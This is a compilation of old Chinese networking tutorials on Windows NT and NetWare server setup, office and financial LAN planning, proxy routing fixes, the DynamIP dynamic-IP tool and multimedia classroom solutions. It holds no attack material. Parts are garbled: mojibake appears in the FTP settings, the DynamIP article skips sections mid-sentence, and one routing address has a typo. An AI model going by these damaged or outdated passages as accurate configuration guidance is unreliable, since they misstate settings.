    b.开始设置。单击“TCP／IP协议” → “属性”→单击“IP地址”项，适配器即为您的网卡，如果只有一个网卡，则默认就行了，如果有多个，则选择一个用于局域网的网卡。选择“指定IP地址”并设定服务器的IP地址（如：192.168.0.1）。再输入子网掩码，各用户的子网掩码必须统一，例如统一填入“255.255.255.0 ” 即可。默认网关输入：192.168.0.1 单击“DNS设置”项，选择“启用DNS”分别填入你的“主机”（如NTSERVER）、“域”(如：company.com.cn)、“DNS服务器搜索顺序”的“添加”，输入服务器IP（如：192.168.0.1）等内容。WINS 地址：主WINS 服务器：192.168.0.1；其他默认；DHCP中转：添加->输入：192.168.0.1->添加->确定；回到“网络”窗口的“服务选项”单击“添加”→出现“选定网络服务”窗口，单击“Microsoft DHCP服务器”后按“确定”，添加完毕后，按“关闭”会出现提示，可能会要求插入NT 4.0 光盘。其它按“确定”就行了。用同样的方法添加“DNS服务器”。安装完毕后，提示要使设置生效必须重新启动计算机。按“是”重新启动电脑，记得取出 NT 光盘。
    重新启动计算机，在管理工具中就多了两项:WINS管理器和DNS管理器。为了使这两项服务器生效，你还必须对它们进行设置。在大多数情况下，网络内部只有一台WINS服务器，因此，WINS的设置已经由系统设置好了，可以暂时不管。
检验：
    协议安装完毕后你可以对当前的网络配置进行检验，进入DOS窗口，运行：
㈠ Ping 本地主机地址（127.0.0.1）。这让你知道你的 TCP/IP 是否正在工作或者TCP/IP协议是否安装正确。
㈡ Ping 网卡的 IP 地址（192.168.0.1)。如果Ping 本地主机地址正常，但这次不能工作，你就知道是网络配置不正确。
㈢ Ping 你的默认网关地址。如果你能够 Ping 本地 IP 地址但是你的网关不响应，你可能有一个错误的网关地址，或者是网关上坏的端口，或者是网关没有工作或者配置错误。
㈣ 要想检验WINS是否起作用，可以ping NTSERVER,如果WINS已通，就可以看到对应的IP地址在接收可返回数据包。
    以上 Ping 的结果都返回数据包，其中应有：
——Pinging　127.0.0.1 with 32 bytes　of data：
     ——Reply　from 127.0.0.1 ：bytes=32 time < 10ms TTL=128
    如果ping主机名称不通而IP地址可以，就检查一下网络配置里的TCP/IP协议的配置是否有误；如果连IP都ping不通，嘿嘿嘿，恐怕就只好从头来过了。

添加 NT 用户：
    单击“开始” → “程序” → “管理工具（公用）” → “域用户管理器” → 弹出“域用户管理器”窗口。里面已经有 Adiministrator　及 Guest 两个用户。单击“用户”菜单 → “新用户” → 输入：
——用 户 名：computer01
——密 码：********
——确认密码：********（必须与上一个密码一致）
    只选择“密码永久有效”，单击“添加”。重复步聚，添加其它你要的用户。添加完后“关闭”。

返回


安装双文件服务器

《一键清理系统垃圾》

安装双文件服务器

     安装双服务器，当一台服务器无法正常工作时，另一台能继续维持网络的运行，提高了网络的可靠性。下面以安装两台Novell服务器为例说明其安装办法。
    需要注意的是，安装时，两台文件服务器的名字及IPX 内部网络号不能相同，而相同帧对应的网络号应该一致。请参考下面的两个Autoexec.ncf文件：
    File server name FSV1
    IPX internal net 9703
    Load NE2000 port=300 int=3 frame=ETHERNET_802.2
    Bind IPX to NE2000 net=3
    File server name FSV2
    IPX internal net 9907
    Load NE2000 port=300 int=3 frame=ETHERNET_802.2
    Bind IPX to NE2000 net=3
    当用同一套软件安装两个服务器时，控制台及工作站上会出现版本冲突性错误提示。解决的办法是将其中一台服务器上的启动文件server.exe换成另一个版本(可以从文件长度及生成日期上来判断)，即可正常使用。
    若用户在两台服务器上都拥有帐户，就可在Login 命令中加上服务器名来选择要连接的服务器，若要同时连接两台服务器则应使用Attach命令。执行下列命令，用户User3可同时连接服务器FSV1和FSV2：
    Login FSV1/User3
    Attach FSV2/User3
    Map Root C:=FSV1/SYS:Home/User3
    Map Root D:=FSV2/SYS:Home/User3
    所述过程在Netware 3.12上验证通过。

返回


办公网规划两步曲

《一键清理系统垃圾》

办公网规划两步曲

一、办公网的技术与设备选择
    网络协议及软硬件体系是网络发展的基础，也是网络建设的重点。建网初期，要进行网络规划，为使网络规划经得起考验，在规划中应对网络协议、软硬件体系等核心因素做充分论证。在确定建网方向时，要面向应用，面向需要，充分利用现有资源，结合应用和需要的变化，制定相应的方案，不要一味追求高、新、难，避免使用不成熟的技术，某些过渡时期的技术很有可能导致网络建设的失败。
    现在，大多数办公网选用以太网。业界也普遍认为以太网是最适合办公系统的网络技术，其中，100Mbps的快速以太网是理想的选择。随着交换、路由技术的发展，以太网的性能将更具吸引力。
    在网络建设中，布线可以说是真正的一次性投资，人们很难以追加投资的方式来提高它的性能。布线系统的性能在很大程度上决定了网络的使用性能，所以布线系统的规划应以目前所能达到的尽可能高的性能为标准。对于LAN应坚决使用五类线，如果有可能，可使用新兴的超五类线。
    在网络设备的选择上，应尽量选用性能好、适用范围宽的产品。比如：网卡应尽量采用10/100M的自适应网卡，主干交换机至少要用100M交换机。这样既可充分利用现有的10M网资源，又可为以后支持大流量的多媒体信息提供足够的带宽。
    对于计算机硬件、系统软件及各种应用软件，都存在兼容性和升级的问题。软件还有一个本地化(即汉化)的问题，我们应该尽量选用中文版或有中文平台支持的软件系统，让用户用自己熟悉的语言使用计算机网络。
    二、办公网的设计与实现
    办公网络的设计包括：服务器规划、工作站实现方式选择、工作流设计等。
    在办公网络中，大部分的共享信息、交换信息都要通过网络服务器来存储和传送。服务器的品质将很大程度上影响整个网络的工作效能。服务器的规划包括对服务器硬件配置的选择，网络信息在服务器上的存在方式、存储格式的设计等等。对网络管理员来说，服务器的规划是至关重要的。
    在初次搭建办公网络时，可选用比较成熟的通用办公软件作为工作站桌面应用的实现方式，也可以购买或开发本系统或本行业专用的办公系统软件。后者较前者在成本、兼容性、可靠性等方面都略逊一筹，但其在适用性上占有优势。
    现代办公管理中强调相互协作，这种协作是靠工作流技术来实现的。工作流是指对象按照某种规则在网上进行流动，它的载体是网络。工作流技术可以很好地描述办公管理中电子公文的处理和传递方向。办公网络中常见的工作流有四种，它们是伞状顺序工作流、伞状并发工作流、树状工作流和网状工作流。网状工作流是工作流中最复杂的一种。
    工作流的实现方式主要有两种：一种是基于数据库，一种是基于电子邮件。基于数据库的工作流主要依赖数据共享来实现工作流，在开发上只需借助数据库开发技术即可，其优点是工作流和应用系统结合紧密，缺点是实现广域范围的工作流很难。基于电子邮件的工作流只需利用电子邮件的接口，其优点是实现广域范围的工作流比较容易，缺点是工作流和应用系统分离。在具体应用时选用工作流的哪种实现方式，要依据应用和需求的具体要求、现有技术和系统构成等条件来确定。

返回


财务电算局域网组建实例

《一键清理系统垃圾》

财务电算局域网组建实例

      为了适应现代财务管理的需要，加强会计基础工作规范，促进会计工作从核算型向管理型转变，我单位成功组建了一个以财务电算为主体，集档案管理信息、罪犯管教信息、办公信息于一体的Windows NT局域网络。它覆盖整幢办公大楼，并在监狱长办公室专门设置一站点，便于领导查询各种信息。现将整个安装及调试过程作一介绍。组建此网经历了以下三个阶段：
    一、 规划阶段
    1． 网络类型的选择
    为了便于调试和维护，采用星型拓朴结构。
    2．网络布线的选择
    由于本单位网络在办公大楼内（共三层），所以对本科室和较近的科室采用双绞线，对较远的科室采用细缆连接。
    3． 网络软硬件的选择
    软件：操作系统为Windows NT4.0，财务软件为用友7.01 网络版。
    硬件：由于NT的要求，服务器采用Compaq Prosinia (32M RAM，2G硬盘)。总站采用Compaq Deskpro 2000(16M RAM，1.2G硬盘)。其他站点全部采用奔腾100(16M RAM、1G硬盘)。集线器（HUB）采用D－LINK（16口）。网卡采用NE2000兼容网卡。
    二、 准备阶段
    1. 人员培训：网管人员为计算机专业毕业，其他操作人员全部经过专门的培训，其中财会人员全部经过用友集团会计电算化培训。
    2.软硬件选购:包括：NT4.0、用友7.00（现已升级到7.01）、DOS6.2、其他调试维护软件和微机、HUB、双绞线、细缆、软管、网卡、T头、BNC头、终结头、剥线钳、压线钳等。
    三、 网络安装调试阶段
    1. 安装服务器
    1） 利用DOS6.2将服务器硬盘分区、格式化，将其分为2个DOS分区（如网站中有利用DOS上网的，最好划为两个分区）。
    2） 装入DOS6.2。
    3） 执行NT安装程序，如D:\I386\WINNT/B，出现SETUP窗口。执行过程中需要三张空软盘，用来拷贝一些在后面安装过程中要用到的程序。
    4） 按提示选择“快速安装”方式。
    5） 选择“在现有的FAT分区上安装Windows NT”，系统提示是否要将FAT转换成NTFS分区，选择“转换”(注：如使用NTFS，则启动系统时不能方便地引导DOS，而只能在启动NT后在控制台状态下运行DOS的应用程序；如使用FAT，则NT中的文件系统中的安全菜单将不能使用)。
    6） 按提示进行，在“服务器安全系统角色”选“服务器”。
    7） 在“选择许可协议方式”中，按需要选择服务器的同时连接数，例如20个。
    8） 在Windows NT安装程序窗口中选“Nwlink IPX/SPX传输（N）”。
    9） 在“系统管理员账号”中输入自己的口令。
    10） 最后，按提示创建一张紧急修复盘。在网络出现问题时，这张盘非常有用。
    至此，NT软件安装完毕，下一步是创建用户组及用户名等。
    2. 创建用户组和用户名及相应权限
    1） 创建全局组。按科室分类创建不同的组，如财务组（CWOFFICE）、管教组（GJOFFICE）、办公组（BGOFFICE）、档案组（DAOFFICE）、其他组（QTOFFICE）等，并分别为它们分配不同的权限（分配方法是先选定组，再选择相应的权限条）。
    2） 选择“开始”—“程序”—“管理工具”—“域用户管理器”，出现域用户管理窗口，点击“用户”—“新用户”，输入用户名、全称、描述、密码等。
    3） 选择相应的账号组，登录时间及登录机器限制，用户账号过期限制等。
    4） 创建好各个账号后，选择“规则”—“账号”，配置每个账号属性，在“规则”—“用户权限”中选择在组账号下的相应的各个账号的权限。
    5） 在“规则”—“审核”下选择相应的审核事件，以后系统将把这些事件记入安全日志，为网络维护带来很大方便。
    3. 安装客户机
    1） 在全部客户机上安装WIN95。
    2） 在“控制面板”—“网络”中选“添加”－“客户”－“Microsoft网络客户”。
    3） 选择“网络适配器”，选“Intel Etherfx Press（TM） 10 ISA LAN Adapter（PNP Enabled）”。
    4） 配置网卡。双击它，选择“增强模式（32位和16位）的NDIS驱动程序”。在“绑定”中选“IPX/SPX兼容协议”和“NETBEUI”，“高级”中选“AUTO－CONNECTOR”。
    5） 配置IPX/SPX兼容协议。双击它，选择“希望启用IPX/SPX上的NETBIOS（E）”，“绑定”中两项都选。即启用网络基本输入输出系统。
    6） 选定“IPX/SPX兼容协议的NETBIOS支持”中的“Microsoft网络客户”。
    7） 选定“NETBEUI”属性中的“Microsoft 网络客户”。
    8） “文件和打印共享”中的两项都选。
    9） 在“标识”中输入自己的计算机名称。
    10）在“访问控制”中选择“用户级的访问控制”（可根据实际需要选择）。
    4. 安装用友软件
    用友七大系统（集成账务、报表、工资、固定资产、资金计息、财务分析和领导查询）需在每台计算机上安装，以便在各个本地站的Windows中正确注册。安装前先将服务器用于安装用友财务软件的目录指定，并在各个工作站映射。安装过程中注意以下几点：
    1） 光盘中有Net95和NetNT，分别指在WIN95工作站上安装和在NT工作站上安装。
    2） 安装路径的选择。各个工作站上的映射盘符必须完全一致。例如，将服务器C:\UFSHARE在每个工作站上均映射为F：。
    3） 软件安装时，系统执行文件目录选择C:\UFSOFT\ZWWIN，系统共享文件及ZWSET.MDB路径为F:\UFSOFT\ZWWIN\（为了提高运行速度，软件将执行文件与数据库文件分开放置）。
    至此，整个局域网的安装完成。

返回


代理服务器的路由问题

《一键清理系统垃圾》

代理服务器的路由问题

    配置服务器的RAS服务和拨号网络后，进行拨号连接。此时的代理服务器中相当于存在两块接口卡，即一个网卡和一个调制解调器，可以把它看作是一个路由器，为客户和外界提供路由转发功能，因此必须查看并调整服务器的路由设置，以保证服务器与客户的正常通讯。

    在服务器上进行拨号，在DOS模式下通过ROUTE命令查看服务器的路由表。下面仅以缺省路由为例简单分析NT服务器在拨号过程中的路由表，假设10.119.40.254为服务器所在网段的网关，10.119.40.49为NT服务器网卡的IP地址。

    拨号前服务器路由表（表1）：

    NETWORK ADDRESS NETMASK GATEWAY ADDRESS INTERFACE METRIC

    0.0.0.0 0.0.0.0 10.119.40.254 10.119.40.49 1

    拨号后服务器路由表（表2）：

    NETWORK ADDRESS NETMASK GATEWAY ADDRESS INTERFACE METRIC

    0.0.0.0 0.0.0.0 10.119.40.254 10.119.40.49 2

    0.0.0.0 0.0.0.0 10.18.168.168 10.18.168.168 1

    其中10.18.168.168为INTERNET服务器分配给本拨号网络（调制解调器）的IP地址。经对比表1和表2，在拨号前后的缺省路由有了变化。分析这一现象，主要是由于在服务器中“拨号网络”，“TCP/IP设置”的选项中，选择了“使用拨号网络的默认网关”的缘故，这样服务器每次向10.119.40.0网段的客户发送信息都首先经过10.18.168.168的地址。当网络上的客户要求访问INTERNET站点时，每次都要通过局域网到NT服务器，然后至MODEM。所以必须保障客户机与服务器的正常连通，使路由过程通过10.119.40.49局域网网卡进行。应用PING命令进行检测，服务器可以PING通客户机，而客户机PING服务器时出现超时（TIME OUT）。这一现象表明由于代理服务器的默认路由发生了变化，从而使客户与服务器的连通首先要经过10.18.168.168来转发。解决这一问题须做以下设置，假设某客户所在网段为122.103.1.0，SUBMASK:255.255.255.0，需向路由表中填加指定项目，即执行命令ROUTE ADD 122.103.1.0 255.255.255.0 10.119.40.49。其中10.119.40.49为NT服务器的网卡IP地址，再查看服务器路由表如下：

    NETWORK ADDRESS NETMASK GATEWAY ADDRESS INTERFACE METRIC

    0.0.0.0 0.0.0.0 10.119.40.254 10.119.40.49 2

    0.0.0.0 0.0.0.0 10.18.168.168 10.18.168.168 1

    122.103.1.0 255.255.255.0 10.199.40.254 10.119.40.49 1

    进一步分析，我们还可以通过修改默认路由的方法来达到我们的目的，即使用ROUTE ADD 0.0.0.0 0.0.0.0 10.119.40.49 1 IF METRIC=2

    使路由表设置为：

    NETWORK ADDRESS NETMASK GATEWAY ADDRESS INTERFACE METRIC

    0.0.0.0 0.0.0.0 10.119.40.254 10.119.40.49 1

    作为特殊情况，我们分析一下局域网远程用户的路由问题。在局域网中存在远程用户，它们通常经过专用的通讯线路与局域网连接，如果它们试图通过代理服务器访问INTERNET，必须在NT服务器上配置路由表。由于这类远程用户访问INTERNET需要经过2次拨号服务，在PROXY代理服务器上直接的路由设置尤其必要。如上所述，局域网的客户还可以通过修改默认路由的方法使服务器和客户连通。对于远程客户则不然，必须直接设置代理服务器的路由。假设远程用户（拨号网络服务器）所在的网段为122.100.1.0，SUBMASK:255.255.255.0，须加入路由：ROUTE ADD 122.100.1.0 255.255.255.0 10.119.40.49，才能保证远程用户的直通性。否则，在客户拨通局域网时，远程客户机能PING通网上其它所有的设备，惟独PING NT服务器时超时错误。这说明代理服务器的默认路由此时并没有起作用。

返回


电子商务解决方案

《一键清理系统垃圾》

电子商务解决方案

一．　方案名称

现行企业电子商务及办公业务整体解决方案

二、硬件组成及其特点

整个系统服务器采用IBM Netfinity系列，它是为Windows NT设计的魔力宝箱。有强大处理能力和扩展能力，能满足不断增长的网络用户需求，它为关键商务应用提供高可用性和强大性能，是电子商务、商业智能（数据仓库、数据采掘）， 运行大型企业应用或迅速扩展的中小型商务应用的明智选择。

·IBM Netfinity 7100集成了众多增值特性，融合了X-体系架构的诸多创新，为您提供物超所值的丰富特性，其中包括：可实现全面控制的高级系统管理处理器；使监控和维护易于实现的预测故障分析及光通路诊断；面向高可用性的电源管理功能；实现网络连接的10/100以太网特性；以及集成的双通道Ultra2 LVD SCSI控制器，可以提供快速可靠的存储扩展能力。可选的ServeRAID SCSI适配器和磁带库能够为您提供全面的数据安全性和备份解决方案;

·IBM Netfinity 3000作为一种既可以承受又可以带来可靠的文件和打印服务、工作组生产应用和共享因特网存取解决方案, 还可以免费获得带有5个客户端许可证的Lotus Mail Server，使Internet Mail 传送安全可靠、便于管理；

网络互连设备都采用Cisco全线产品：电子商务环境必须满足主干网/分布和服务器集合环境中的可伸缩性、高可用性、多服务应用及性价比的需求，而Cicso产品能提供卓越的可伸缩性和性价比，它支持广泛的接口密度、性能和高可用性选项，通过提供应用智能、服务质量机制和安全，各公司可以更加有效地利用他们的网络增加客户服务，拓展自己的业务。

·Cisco 3600、1700系列路由器、中心骨干三层交换采用Catalyst 6509交换机，其它二级交换采用Catalyst 3500、2900系列交换机；

·CISCO产品通过将公司的内部网和企业应用系统扩展到重要的合作伙伴公司，可以创建一个"供应方"电子商务网络-外部网，它能够： 降低成本、提高客户满意度 、与供应链合作伙伴共享关键信息以实现更好的结果 、重塑您与关键贸易合作伙伴的关系，生成一流的结果；

网络电源保护

·采用APC全线产品，路由器、交换机、服务器按照不同规格采用不同型号的UPS,具体如方案图所示。

·APC UPS不仅能提供电池后备及浪涌保护，还提供PowerChute plus电源管理软件。这就允许你定制你的UPS，使它能帮助你从网上或通过带外、SNMP、电话线等远程重启网络设备。而且只有APC能集成并使用CiscoWorks2000进行管理，它是Cisco认同的唯一的UPS厂商，而且APC能抵御停机的两个最大原因：NOS挂起及电源问题。

系统平台

·Windows 2000包含从台式机到高端集群服务器的一系列产品，这些产品让Internet促进了您的商业，加强了系统可靠性，通过改良的管理削减了费用，并且可以完全利用新式硬件和通信产品。

·Web Server、Domino Server用微软Windows 2000企业版作为网络平台，以Domino中文版为办公自动化的应用平台，数据库系统采用微软SQL Server。所有客户端操作系统均采用微软Windows 2000 专业版或WinNT Workstation、Windows 98/95，应用平台是Lotus Notes。

·Lotus Domino是网络上最先进的群件和电子邮件服务器，提供了一整套集成的服务，为我们方便地通过我们的产品为用户提供使用Internet、Intranet和广域网建立安全的、交互式的商业解决方案。Lotus Notes是世界领先的结合了邮件处理、群件和Internet的客户机解决方案。

方案整体特点
·它以低廉的价格提供强大的性能；

·集四大厂商的优秀产品于一体,是一个理想的电子商务、中小企业商务应用和文件共享办公自动化解决方案；

·获得更加可靠的数据存取、分支机构和总部、各公司之间的信息流通；

·安全的Internet访问和Internet 防火墙；

·适应强大的电源保护；

·Windows 2000 Server版本在IBM的测试中心通过严格测试，证明Netfinity全系列产品均支持Windows 2000 server版本，用户可以放心使用，享有IBM Netfinity与Microsoft Windows 2000带来的稳定、可靠、先进的性能；

·创建一个"供应方"电子商务网络-外部网。

返回


一、IP地址与IP地址的动态分配

《一键清理系统垃圾》

一、IP地址与IP地址的动态分配

    1. IP地址基本概念

    Internet依靠TCP/IP协议，在全球范围内实现不同硬件结构、不同操作系统、不同网络系统的互联。在Internet上，每一个节点都依靠唯一的IP地址互相区分和相互联系。IP地址是一个32位二进制数的地址,由4个8位字段组成，每个字段之间用点号隔开,用于标识TCP/IP宿主机。

    每个IP地址都包含两部分:网络ID和主机ID。网络ID标识在同一个物理网络上的所有宿主机，主机ID标识该物理网络上的每一个宿主机，于是整个Internet上的每个计算机都依靠各自唯一的IP地址来标识。

    IP地址构成了整个Internet的基础，它是如此重要，每一台联网的计算机无权自行设定IP地址，有一个统一的机构―IANA负责对申请的组织分配唯一的网络ID,而该组织可以对自己的网络中的每一个主机分配一个唯一的主机ID，正如一个单位无权决定自己在所属城市的街道名称和门牌号，但可以自主决定本单位内部的各个办公室编号一样。

    2. 静态IP与动态IP

    IP地址是一个32位二进制数的地址，理论上讲,有大约40亿（2的32次方）个可能的地址组合，这似乎是一个很大的地址空间。实际上，根据网络ID和主机ID的不同位数规则，可以将IP地址分为A（7位网络ID和24位主机ID）、B（14位网络ID和16位主机ID）、C（21位网络ID和8位主机ID）三类，由于历史原因和技术发展的差异，A类地址和B类地址几乎分配殆尽，目前能够供全球各国各组织分配的只有C类地址。所以说IP地址是一种非常重要的网络资源。

    对于一个设立了因特网服务的组织机构，由于其主机对外开放了诸如WWW、FTP、E-mail等访问服务，通常要对外公布一个固定的IP地址，以方便用户访问。当然，数字IP不便记忆和识别，人们更习惯于通过域名来访问主机，而域名实际上仍然需要被域名服务器（DNS）翻译为IP地址。例如，你的主页地址是www.myhost.com，用户可以方便地记忆?..modem.com/dips/<你的账户名>。

    这一功能允许网上用户通过该URL访问你的本地主页，这是指在本地主机安装的Web服务器（例如个人Web服务器）。当你要调试主页或者无法找到一个提供满意的免费主页服务器，或者你认为上载主页太浪费时间时，这项功能就显得尤为重要，目前的虚拟域名服务与此不同的是，虚拟域名服务要求你的主页必须安放在具有固定域名的主页服务器上，然后才能提供转移访问，而动态IP服务器则可以随时跟踪你的动态IP，并将访问者转移到你的本地Web服务器上。只要你联网并且你的本地Web服务器正在运行，DynamIP可以自动地确定你的DIPS信息是否需要更新到动态IP服务器。配合DIPS，用户可以在不上载任何文件的情况下进行Web聊天。

    4. POP mail checker：电子信箱检查，可最多检查5个不同的POP3账户，并在新邮件到来后以可视或声音信号进行提示，自动运行E-mail客户端软件取信。

    5. IP chat：点对点IP聊天，类似IRC，但是不需要任何IRC服务器，DynamIP可以在用户指定IP地址区间内扫描，你可以向所有聊天成员或者特定IP地址广播消息，你可以向其他聊天成员打招呼以引起对方注意并建立一个私人聊天。DynamIP支持微软网络电话软件MS NetMeeting。

    6. WEBchat：Web聊天。你的主页访问者可以利用浏览器直接与你对话，即使对方没有安装DynamIP，前提是你在主页中安装了如图2的页面，该页面将被DynamIP动态更新，浏览器必须支持forms，Netscape和Internet Explorer，毫无疑问都支持forms。访问者可以在forms中填写语句，然后按submit按钮，该语句被发送到你的计算机（利用DynamIP捕获的动态IP）。可以与功能3配合实现本地Web聊天，则不必上载主页到任何服务器。

    7. HTTPscan：HTTP扫描。DynamIP可以在用户指定IP地址区间内扫描，并以超文本文件格式生成一个包含所有被搜索到的HTTP服务器的清单。用途之一是当你与某人进行点对点IP聊天时，你可以立即访问对方的主页。

    8. PC Clock Synchronizer：时钟同步。DynamIP可以从NTP服务器获得精确的日期和时间以校准你的机器时钟，另外也可以用来部分地解决“千年虫”问题。

    五、DynamIP的安装、设置

    1. DynamIP的安装

    DynamIP的安装只有一个条件，那就是你的Windows系统中必须有VB6.0的运行库―MSVBVM60.DLL。该文件没有包含在DynamIP的软件包中，用户必须从微软公司VB官方站点下载，文件名是Vbrun60new.exe，它是自动安装文件，文件长度为1MB。

    2. DynamIP的设置

    DynamIP的基本原理是很简单的，DynamIP将利用模板文件（Template）中的各项形式参数来更新一个本地文件，该文件包含了你的当前动态IP地址，然后DynamIP自动上载该文件到你的个人主页服务器，于是其他访问你的主页的用户可以利用该页面上的动态IP地址信息与你建立连接，实现各种网络应用；或者DynamIPS更新你的DIPS信息到动态IP服务器，所有访问该服务器的用户可以被转移到你的本地Web服务器上。所以在设置和准备DynamIP的时候，一切工作都是围绕这个模板文件和你的动态IP地址进行的。

    DynamIP的主要功能是Uploader文件上载工具（动态IP地址发布），本文将以此为例介绍DynamIP的设置，其他各项功能的设置类似。运行DynamIP，选择setup-uploader，则进入设置窗口（图3），各项参数如下：

    Active：打开/关闭此项服务；

    Remote Host：你的主页所在的FTP主机地址，注意不要填写主机上的路径；

    Login：你的FTP账户名；

    Password：你的FTP账户口令；这三项参数使得DynamIP可以登录到你的FTP主机，自动上载更新的文件，通常填写的是存放饕车闹骰?刂贰?

    Template Online：联机模板文件，该文件将用来生成包含你的IP地址的动态本地文件（LocalFile），模板文件不会被更新。本地文件和模板文件名字不能相同，否则DynamIP不会正常工作。如果此项填写“”，则DynamIP将上载未更新的本地文件，可以用来上载数码相机拍摄的图片进行动态直播，参看“refresh every”。

    Template OFFline：脱机模板文件，通常与联机模板相同，如果你想在脱机之前上载一个不同的页面，你可以选择一个不同的模板文件，此项可以填写“”，功能同上。

    Local File：本地动态文件的路径和文件名，以联机或者脱机模板文件为样式更新的文件，包含用户当前动态IP地址等信息。

    Remote File：存放在FTP服务器上的远程动态文件的路径和文件名，本地动态文件将上载和覆盖该文件，不要填写服务器的域名或者IP地址。

    IP：联机模板文件中的IP地址形式参数，该参数将在联机时被用户当前的动态IP地址所替换，DynamIP默认的形式参数是NOT.ON.LINE.NOW，通常没有必要改动，若改动，则此项内容必须与模板文件中的形式参数名完全相同。模板文件中还包含了其他形式参数，如IP、DateTime、WEBchat、HTTP Server、FTP Server，这些形式参数都将在联机时被DynamIP自动替换，因此最好不要随便改动，即使改动，也要注意每个形式参数的名称不得相同

    ，并且各项内容必须与模板文件中的形式参数名完全相同。

    post last IP(OFFline)：张贴上次IP地址，脱机模板文件中代表上次IP地址的形式参数，默认值为( is the default value)。此项内容必须与模板文件中的形式参数名完全相同。

    DateTime：联机模板文件中的日期时间形式参数。

    HTTP Server/Port：联机模板文件中的HTTP服务器/端口形式参数，这里的HTTP服务器系建立在本地主机上的HTTP服务器（例如个人Web服务器），DynamIP用你的当前动态IP地址替换该参数，以便将访问者转移到你的本地Web服务器。默认值为：“default value is HTTP Server NOT available. ”默认端口值为：80。

    FTP Server/Port：联机模板文件中的FTP服务器/端口形式参数，含义同上，只是服务器为本地FTP服务器。默认值为：“FTP Server NOT available”，默认端口值为：21。

    FTP UserID：联机模板文件中的FTP用户ID形式参数，默认值为：“anonymous”，可以改变为其他账户名。

    六、DynamIP应用实例

    假如网上任意两个用户（实际上是计算机）能够相互知道对方的IP地址，则双方就能利用TCP/IP建立直接的点对点网上连接，进行信息沟通。更进一步，主叫方只要获得了被叫方的IP地址，就可以发出呼叫、建立连接、实现应用，如利用网络电话直接通话或者发送文件。DynamIP正是抓住了建立点对点IP连接的关键环节，捕捉并发布用户的当前动态IP地址，以便接收其他用户的呼叫。以下为DynamIP应用举例。

    1. 点对点网络电话

    在主页中添加下面一行语句：

    我正在网上，请给我打电话

    若访问者通过IE浏览器访问该页面，点击该超链接将会运行网络电话软件NetMeeting呼叫IP地址为111.222.123.123的计算机，如果对方的NetMeeting处于等待状态，则可以接收到呼叫，并进行通话。

    微软公司的浏览器支持callto协议，可以用NetMeeting呼叫该超链接指定的IP地址。但是Netscape的浏览器不支持callto，解决的办法是改为一个指向快速拨号文件的超链接，这样无论是在IE还是在Netscape中，打开该拨号文件都会运行网络电话软件NetMeeting。

    语句如下：

     我正在网上，请给我打电话

    这里ls.cnf是一个NetMeeting的快速拨号文件，记录了被叫方的IP地址，内容如下：

    [ConferenceShortcut]

    ConfName=111.222.123.123

    Address=111.222.123.123

    CallFlags=65543

    Transport=1

    类似的语句还有：click here to call me，可以激活Vocaltech Iphone。

    以上工作可以直接利用DynamIP的联机模板文件（图2）来实现，DynamIP将利用模板文件更新本地动态文件，上载并覆盖远程动态文件，主页的访问者看到的是包含当前IP地址的超链接，点击超链接将会激活网络电话软件，建立点对点网络电话连接服务。网络电话NetMeeting支持利用服务器实现的间接连接和呼叫对方IP地址的直接点对点连接，这里使用的是后者。如果你上载了脱机文件，访问者将得知你不在网上。

    2. IP chat：点对点IP聊天（图4），类似IRC，但是不需要任何IRC服务器，因为双方已经知道IP地址。注意要在Setup--pchat中打开Active。工具栏中有用于呼叫、扫描、睡眠/唤醒的各项功能按钮。

    3. WEBchat：Web聊天，你的主页访问者可以利用浏览器直接与你对话（图5），即使对方没有安装DynamIP，前提是你在主页中安装了如图2的页面，该页面将被DynamIP动态更新。

    用户可以决定上载联机文件或者脱机文件，以便及时通知访问者自己是否联网。

    4. 动态IP的个人Web服务器：若已经在本地主机安装了个人Web服务器，可以利用DIPS服务，将访问者转移到你的本地主机。这需要申请一个免费账户。网址是：

    http://postmodem.com/dips-admin/。

    七、总结与提示

    DynamIP可以捕获和发布用户的当前动态IP地址，从而使点对点的IP连接成为可能，这些是网络传呼软件无法做到的。另外，对于每一种基本功能，如果能够巧妙地结合其他方法，往往能实现更复杂的应用。例如，你是否想过在运行TCP/IP的局域网上使用DynamIP的强大功能呢？

    同时应该注意到，DynamIP更像是为高级网络用户准备的发烧级工具。在网上公布自己的动态IP地址固然有利于沟通，但同时也带来了相当大的风险，因为黑客用以搜索和攻击目标的坐标就是IP地址，许多流行黑客工具甚至只需要一个输入参数―你的IP地址。因此，最好不要在存放重要资料的计算机上进行这些高级网络应用试验。


多媒体网络教学解决方案

《一键清理系统垃圾》

多媒体网络教学解决方案

一、 多媒体（视听）
    电脑网络教室方案

    多媒体(视听)电脑网络教室方案，可以实现电脑教学的功能多样化。老师不用再花很多时间写黑板，学生也不必再挤在一起，围在小小的荧幕前观看老师的示范。

    电脑网络教室可以分为单一电脑教室、网络电脑教室、远程电脑教室。

    下面详细介绍远程电脑教室方案：

    适用范围： 适用于在校园与校园之间构架多间多媒体(视听)电脑网络教室

    方案特点： 实现AV影音广播，闭路电视讯号（电大课程）实时转播，实物动态影像实时广播，教室与教室之间的双向互动教学，校际教室与教室之间的双向远程教学

    系统整合： 教师用机选用HP Vectra VL600

    学生用机选用HP Brio400

    网络产品选用HP 12/24口10/100M Base-T HUB

    HiClass软件版(或HiClass II)

    HiConverter多媒体智能视讯转换平台

    闭路电视

    实物投影展台

    Microsoft NetMeeting

    系统架构如图1

    图1远程电脑教室

    二、 多媒体视听数字

    图书（阅览）馆方案

    多媒体视听数字图书(阅览)馆方案，一改传统的视听图书(阅览)馆的运作观念。您可以节省时间，简化手续。

    多媒体视听数字图书(阅览)馆方案可以分为数字视听图书馆、校园虚拟图书馆、分布虚拟图书馆。

    数字视听图书馆方案，对校园图书做了周详的考虑，满足了学校图书馆的需求，同样也能适应各科系图书分馆的要求。通过对VideoFinder资源库管理系统的整合，能完美地实现各图书馆资讯统一，形成一个分布式的校园网络虚拟多媒体视听数字图书(阅览)馆。

    三、 多媒体可视化

    数字语音(言)教学方案

    多媒体可视化数字语音(言)教学方案，结合了具有多年教学经验的资深教师的建议，针对老师和学生的需求，设计出突破性的可视化数字语音(言)方案。

    图2 卫星课堂点播教学方案：

    这套方案中，提供了多样化的第二外语的教学手段，如讲解、讨论、分组练习和个别练习，而这些手段又是凭借校园网络，以数字化、可视化的形式来实现的。学校从电脑教室获得额外的功能，学生透过HiStudio的强大功能，获得改善的教学方式。因此不论是具备任何层级电脑经验的老师都会使用HiStudio，只需要用滑鼠在画面上点选功能键即可。对学校、老师和学生而言，多媒体可视化数字语音(言)教学方案在学校有着无以伦比的应用前景。

    四、 网上课堂

    直播教学方案

